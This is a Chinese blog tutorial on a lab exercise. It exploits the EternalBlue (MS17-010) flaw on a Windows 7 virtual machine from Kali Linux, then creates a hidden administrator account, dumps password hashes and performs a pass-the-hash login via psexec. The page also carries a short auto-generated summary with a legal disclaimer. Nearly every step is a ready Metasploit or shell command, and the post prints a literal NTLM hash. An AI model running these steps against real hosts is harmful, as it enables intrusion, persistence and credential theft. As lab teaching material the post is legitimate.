通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

环境说明

机器

ip地址

Kali主机

192.168.231.129

win7靶机

192.168.231.143

一、获取目标主机的管理员权限

1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查看,可以看到两台机器在同一个网段内,

即网段都在192.168.231中

2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24进行网段扫描,

可以看到140和143的主机是存活的(因为这里我还开了一台靶机WindowsXP,该实验同样可以在WindowsXP中实现,实验步骤一样),还有一点发现就是在网段扫描中不会出现129的出现,

因为129是Kali攻击机的ip地址,所以不会显示;

3.然后扫描目标主机的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(这里包括以后都以win7为例,winXP是同样的操作),

可以看到这里有一个ms17-010的漏洞,即我们熟知永恒之蓝漏洞,我们就可以利用这个漏洞来获得靶机的shell,

4.使用命令:msfconsole,进入metasploit工具,

然后使用search命令,搜索永恒之蓝有什么可以利用的部分,search ms17-010,

可以看到有0-4五个可以利用的漏洞,这里我们使用0栈溢出漏洞,使用use 0即可,

5.然后它提示我们没有设置载荷,可以使用set命令来设置载荷,如:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

6.然后查看攻击模块所需要配置的参数:show options,

7.在这里我们需要配置lhost,rhost,target,

为了确保参数都配置好了,我们还是查看一下,

可以看到该配置的参数都配置好了,然后就可以进行攻击了,

8.使用run命令,进行渗透攻击,

可以看到我们已经成功渗透进入了win7,并获取了管理员权限,

9.然后进入win7目标机命令窗口,shell,

可以看到出现了乱码,然后我们可以进行调整回正确的显示,输入:chcp 65001即可,

然后我们就可以进行后渗透操作。

二、创建管理员账户

1.首先我们在win7的 控制面板->用户账户和家庭安全->用户账户->管理账户中可以查看现在已有的账户,然后我们进入shell并在目标机创建新的管理员用户,使用命令net user hacker hacker123 /add

2.但在这里我们可以看到,新建的用户hacker并不是一个管理员用户,所以还需要进行提权操作,使用命令,net localgroup Administrators hacker /add

然后我们可以看到hacker有之前的标准用户变成了管理员用户,

三、提取系统用户和密码hash值

提取系统用户名和密码Hash,使用命令,run post/windows/gather/hashdump

可以看到这里有刚刚创建的管理员用户hacker的用户名和hash密码,

四、hash重放攻击

1.所谓重放密码hash攻击,就是不再利用该漏洞,直接通过账户名和密码hash值进行攻击账户,从而达到获取管理员权限的目的。所以我们得退出现有的环境,不用该漏洞,直接exit,然后再重新进去msf,使用msfconsole,

2.接着使用命令:use windows/smb/psexec;并进行payload的设置,set PAYLOAD windows/meterpreter/reverse_tcp;然后设置主机和靶机的ip,

3.在设置账户和密码hash之前要先将win7下的UAC关闭,并将win7重启,不然会失败,

4.设置账户,set SMBUser sherry即可,接着就是使用密码hash进行重放攻击了,直接使用之前获取的hash密码,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

在渗透之前再查看一遍参数是否全部设置成功,

5.在全部准备工作完成好之后,直接exploit即可,也可以使用run运行,

  • 6
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
永恒之蓝是指微软Windows操作系统中的一个漏洞,也被称为ms17-010漏洞。通过利用永恒之蓝漏洞,黑客可以在目标机器上执行远程代码,获得对系统的控制权。在Kali Linux中,可以使用一些工具来进行永恒之蓝漏洞渗透测试。 首先,使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描目标主机,以确定是否存在漏洞。如果扫描结果显示存在漏洞,可以进一步使用exploit/windows/smb/ms17_010_eternalblue模块进行渗透。这个模块可以利用永恒之蓝漏洞远程执行代码,获取目标主机shell。 在Kali Linux中,可以使用search命令来搜索有关永恒之蓝漏洞的可利用部分。具体来说,可以使用search ms17-010命令来搜索与ms17-010漏洞相关的可利用模块或脚本。 需要注意的是,在进行任何渗透测试之前,请确保您已获得合法的授权,并且仅在合法范围内使用这些工具和技术。任何未经授权的渗透测试活动都是非法的。 总结起来,Kali Linux中可以使用smb_ms17_010和ms17_010_eternalblue工具来扫描和渗透永恒之蓝漏洞使用search命令可以搜索与该漏洞相关的可利用部分。在进行任何渗透测试之前,请确保遵守法律法规并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分渗透操作](https://blog.csdn.net/weixin_60182338/article/details/129622710)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)](https://blog.csdn.net/weixin_42474227/article/details/122237494)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值